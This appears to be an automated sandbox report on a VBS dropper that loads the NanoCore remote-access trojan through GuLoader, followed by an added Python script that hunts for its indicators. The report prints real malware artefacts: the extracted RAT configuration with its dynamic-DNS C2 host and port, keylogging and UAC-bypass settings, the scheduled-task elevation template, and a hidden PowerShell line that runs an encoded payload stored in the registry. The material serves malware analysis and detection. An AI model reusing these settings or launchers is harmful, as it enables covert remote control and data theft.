Windows Analysis Report
IMG 0045434.vbs

Overview

General Information

Sample Name: IMG 0045434.vbs
Analysis ID: 562140
MD5: 813117cdcd80979365fd6d9586d11e4a
SHA1: e28ef2705053405e87f440f078f31d13b09a9ee3
SHA256: 1def093ef16309c10c38b5426ac396019c4ddc074394b022626b8dce1ea2acaa

Detection

Nanocore GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Detected Nanocore Rat
Antivirus detection for URL or domain
Yara detected Nanocore RAT
Yara detected GuLoader
Hides threads from debuggers
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Creates autostart registry keys with suspicious values (likely registry only malware)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

AV Detection

Source: 00000010.00000000.266464354998.0000000001300000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?cidO"}
Source: 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "9bd83597-93e4-4366-8889-6a4efb8a", "Group": "2022", "Domain1": "tochukwu1122.ddns.net", "Domain2": "127.0.0.1", "Port": 1122, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
Source: http://pesterbdd.com/images/Pester.png Avira URL Cloud: Label: malware
Source: Yara match File source: 37.2.CasPol.exe.1f1eeadc.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f19eadc.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f1a3105.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1f3105.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f19eadc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1e9ca6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f199ca6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1eeadc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.268467630247.000000001F151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.268476945395.000000001E1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.268477360466.000000001F1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7664, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: Binary string: caspol.pdbx source: CasPol.exe, 00000010.00000003.266576966136.00000000208A2000.00000004.00000800.00020000.00000000.sdmp, dslmon.exe, 00000014.00000002.266736797377.0000000000B62000.00000002.00000001.01000000.00000007.sdmp, dslmon.exe, 0000001A.00000002.266898010453.0000000000BF2000.00000002.00000001.01000000.00000007.sdmp, dslmon.exe.16.dr
Source: Binary string: caspol.pdb source: dslmon.exe, dslmon.exe, 0000001A.00000002.266898010453.0000000000BF2000.00000002.00000001.01000000.00000007.sdmp, dslmon.exe.16.dr

Networking

Source: Initial file: D_Stream.SaveToFile Gefullte5, 2
Source: Malware configuration extractor URLs: https://onedrive.live.com/download?cidO
Source: Malware configuration extractor URLs: tochukwu1122.ddns.net
Source: Malware configuration extractor URLs: 127.0.0.1
Source: unknown DNS query: name: tochukwu1122.ddns.net
Source: Joe Sandbox View ASN Name: DAVID_CRAIGGG
Source: global traffic TCP traffic: 192.168.11.20:49811 -> 185.140.53.143:1122
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 occurrences)
Source: powershell.exe, 0000000A.00000002.266616415243.0000000008E36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.266461629328.0000000008E35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.266608445995.00000000080D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.266459610439.00000000080D0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266840482525.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266551551961.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266562042776.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267134796205.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267399589907.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267057712404.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266971022965.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268393588039.00000000011AF000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268401907263.000000000122D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000A.00000002.266616415243.0000000008E36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.266461629328.0000000008E35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.266608445995.00000000080D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.266459610439.00000000080D0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266840482525.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266551551961.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266562042776.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267134796205.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267399589907.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267057712404.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266971022965.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268393588039.00000000011AF000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268401907263.000000000122D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000010.00000003.266551551961.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: CasPol.exe, 00000010.00000003.266551551961.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://microsoft.co
Source: powershell.exe, 0000000A.00000002.266604273172.000000000641A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.266590681721.0000000005509000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.266588787753.00000000053B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.268515140389.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.268357616536.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268352485259.0000000005351000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.266590681721.0000000005509000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.266588787753.00000000053B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.268515140389.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.268357616536.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268352485259.0000000005351000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000A.00000002.266604273172.000000000641A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.266604273172.000000000641A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.266604273172.000000000641A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.266590681721.0000000005509000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000A.00000003.266207346947.0000000005DE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: CasPol.exe, 00000010.00000003.266840482525.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266551551961.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266562042776.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266561876381.00000000016C0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266840397089.00000000016C0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266551480695.00000000016C1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267134796205.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267399589907.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267057712404.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266971022965.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268392159029.0000000001158000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268394477912.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268401907263.000000000122D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268401655086.0000000001208000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/
Source: CasPol.exe, 00000010.00000003.266840482525.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266551551961.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266562042776.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267134796205.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267399589907.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267057712404.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266971022965.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/&.
Source: CasPol.exe, 00000022.00000002.268393588039.00000000011AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/)M
Source: CasPol.exe, 00000022.00000002.268393588039.00000000011AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/EM
Source: CasPol.exe, 00000025.00000002.268401907263.000000000122D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/N
Source: CasPol.exe, 00000010.00000003.266551551961.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/P
Source: CasPol.exe, 00000022.00000002.268394477912.00000000011ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/_Event_
Source: CasPol.exe, 00000010.00000003.266551551961.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/y
Source: CasPol.exe, 00000025.00000003.268315507584.0000000001285000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000003.268319359560.0000000001285000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268402634074.0000000001275000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/y4m3WEg51wPpMvwOBDGQxc03AePN0yY86OyXcDJxrS2Yo4kmiHKJqicrFmOOu5sbK8F
Source: CasPol.exe, 00000010.00000003.266562538409.0000000001711000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266562042776.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000003.268320218693.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000003.268319359560.0000000001285000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268402634074.0000000001275000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/y4m624plfyYIXAWdtfrz_bfoDWfcwPUj5QFno4RLBcRH3SrJIxCwmlV2VAmgwJvM6c3
Source: CasPol.exe, 00000010.00000003.266562042776.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266552003351.0000000001712000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267134796205.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267399589907.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267057712404.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266971022965.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/y4mLaMkqxgfgA77Nhx7Bu5i00p-BE1O1XpIc_eFvfEnM8XOp9-VuvKR5WbEVOk6Ajy9
Source: CasPol.exe, 00000022.00000003.268306189563.0000000001212000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/y4mamlucM5WMHi-wCNvNvuQyTGytao2V_4itsZyI16BJ46ANIo0HsJrTQX8HYAUh18L
Source: CasPol.exe, 00000010.00000003.266551551961.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/z.3
Source: powershell.exe, 0000000A.00000002.266604273172.000000000641A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: CasPol.exe, 00000022.00000002.268393588039.00000000011AF000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268392159029.0000000001158000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000022.00000003.268306189563.0000000001212000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268401907263.000000000122D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/
Source: CasPol.exe, 00000025.00000002.268398436566.0000000000B60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/download?cid=2B80EFEE51D0620B&resid=2B80EFEE51D0620B%21266&authkey=AEVbDmT
Source: CasPol.exe, 00000022.00000002.268393588039.00000000011AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/x0?b
Source: unknown DNS traffic detected: queries for: onedrive.live.com
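The extracted NanoCore configuration in the AV Detection section and the DNS and TCP observations in this section are the raw material for a responder's checks: which configured "domains" are real C2 hosts, whether the observed connection 192.168.11.20 -> 185.140.53.143:1122 lines up with the configured port, and what the embedded scheduled-task template (BypassUserAccountControlData) actually asks the scheduler for. The script below is an added example, not part of the Joe Sandbox report. The configuration values and the task XML are copied from the extractor output (the XML is trimmed to the elements used here and its closing tag completed so that it parses); the network events are constructed, the dynamic DNS suffix list is a small assumed list, and the DNS answer tying tochukwu1122.ddns.net to 185.140.53.143 is an assumption, since the report shows the query and the TCP connection but not the resolution.

```python
"""Checks derived from the NanoCore configuration and network observations above.

Added example, not part of the Joe Sandbox report. Config values and task XML
are copied from the extractor output (XML trimmed, closing tag completed);
network events are constructed and the DNS answer is an assumption.
"""
import ipaddress
import re
import xml.etree.ElementTree as ET

# Small assumed list of dynamic DNS providers; extend it from your own intel.
DYNDNS_SUFFIXES = ("ddns.net", "no-ip.com", "no-ip.org", "duckdns.org", "hopto.org")
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
 <Principals><Principal id="Author">
  <LogonType>InteractiveToken</LogonType><RunLevel>HighestAvailable</RunLevel>
 </Principal></Principals>
 <Settings>
  <AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled>
  <Hidden>false</Hidden><ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
 </Settings>
 <Actions Context="Author"><Exec>
  <Command>"#EXECUTABLEPATH"</Command><Arguments>$(Arg0)</Arguments>
 </Exec></Actions>
</Task>"""

NANOCORE_CONFIG = {  # subset of the extracted configuration
    "Version": "1.2.2.0", "Mutex": "9bd83597-93e4-4366-8889-6a4efb8a",
    "Domain1": "tochukwu1122.ddns.net", "Domain2": "127.0.0.1", "Port": 1122,
    "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable",
    "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8",
    "BypassUserAccountControlData": TASK_XML,
}

NETWORK_EVENTS = [  # constructed; 203.0.113.10 is a documentation address
    {"type": "dns", "query": "onedrive.live.com", "answers": ["203.0.113.10"]},
    {"type": "tcp", "src": "192.168.11.20", "dst": "203.0.113.10", "dport": 443},
    {"type": "dns", "query": "tochukwu1122.ddns.net", "answers": ["185.140.53.143"]},
    {"type": "tcp", "src": "192.168.11.20", "dst": "185.140.53.143", "dport": 1122},
]


def c2_indicators(cfg):
    """Separate real C2 hosts from placeholders such as 127.0.0.1 and pull the port."""
    hosts, ips = [], []
    for key in ("Domain1", "Domain2"):
        value = cfg.get(key, "").strip()
        if not value:
            continue
        try:
            ip = ipaddress.ip_address(value)
        except ValueError:  # not an IP literal: treat as a hostname
            hosts.append(value.lower())
            continue
        if not (ip.is_loopback or ip.is_private or ip.is_unspecified):
            ips.append(str(ip))
    return {
        "hosts": hosts, "ips": ips, "port": int(cfg["Port"]), "mutex": cfg["Mutex"],
        "dynamic_dns": any(h.endswith(s) for h in hosts for s in DYNDNS_SUFFIXES),
        # UseCustomDNS: the bot resolves via 8.8.8.8 itself, so the corporate
        # resolver log may never see the query; hunt on the wire instead.
        "bypasses_local_resolver": cfg.get("UseCustomDNS") == "Enable",
    }


def match_network(ind, events):
    """Return (index, reason) for events that touch the configured C2."""
    resolved = set(ind["ips"])
    hits = []
    for i, ev in enumerate(events):
        if ev["type"] == "dns" and ev["query"].lower() in ind["hosts"]:
            resolved.update(ev.get("answers", []))
            hits.append((i, "dns query for configured C2 host"))
        elif ev["type"] == "tcp" and ev["dport"] == ind["port"]:
            where = "resolved C2 address" if ev["dst"] in resolved else "unresolved destination"
            hits.append((i, "tcp on configured C2 port to " + where))
    return hits


def uac_task_assessment(xml_text):
    """Parse the embedded task template and report what it asks the scheduler for."""
    # The declaration claims UTF-16 but we hold decoded text; drop it before parsing.
    root = ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text).strip())

    def text(path):
        return root.findtext(path, default="", namespaces=TASK_NS)

    run_level = text("t:Principals/t:Principal/t:RunLevel")
    return {
        "run_level": run_level,
        "command": text("t:Actions/t:Exec/t:Command"),
        "hidden": text("t:Settings/t:Hidden") == "true",
        "no_time_limit": text("t:Settings/t:ExecutionTimeLimit") == "PT0S",
        # Once registered, an on-demand task with RunLevel HighestAvailable starts
        # its Command with the highest token available and no UAC prompt; this is
        # the template behind NanoCore's BypassUAC option.
        "elevates_silently": run_level == "HighestAvailable"
        and text("t:Settings/t:AllowStartOnDemand") == "true",
    }


if __name__ == "__main__":
    ind = c2_indicators(NANOCORE_CONFIG)
    print(ind)
    for i, why in match_network(ind, NETWORK_EVENTS):
        print(i, NETWORK_EVENTS[i], why)
    print(uac_task_assessment(NANOCORE_CONFIG["BypassUserAccountControlData"]))
```

Domain2 is dropped as a loopback placeholder rather than emitted as an indicator, and a TCP hit on port 1122 is reported even when the destination was never resolved in the event stream, which is the case you get when the bot uses its own DNS servers and your only visibility is the connection itself.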

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: CasPol.exe, 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: RegisterRawInputDevices

E-Banking Fraud

Source: Yara match File source: 37.2.CasPol.exe.1f1eeadc.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f19eadc.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f1a3105.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1f3105.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f19eadc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1e9ca6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f199ca6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1eeadc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.268467630247.000000001F151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.268476945395.000000001E1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.268477360466.000000001F1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7664, type: MEMORYSTR

System Summary

Source: 37.2.CasPol.exe.1e1c3f10.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 34.2.CasPol.exe.1e173f10.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 37.2.CasPol.exe.1f1eeadc.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 34.2.CasPol.exe.1f19eadc.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 34.2.CasPol.exe.1f1a3105.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 37.2.CasPol.exe.1f1f3105.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 34.2.CasPol.exe.1f19eadc.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 37.2.CasPol.exe.1f1e9ca6.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 37.2.CasPol.exe.1f1e9ca6.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 34.2.CasPol.exe.1f199ca6.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 34.2.CasPol.exe.1f199ca6.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 37.2.CasPol.exe.1f1eeadc.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000022.00000002.268467630247.000000001F151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000025.00000002.268476945395.000000001E1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000025.00000002.268477360466.000000001F1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: CasPol.exe PID: 3064, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: CasPol.exe PID: 7664, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: Initial file: obj1.ShellExecute MyFile , INTENS ,"","",0
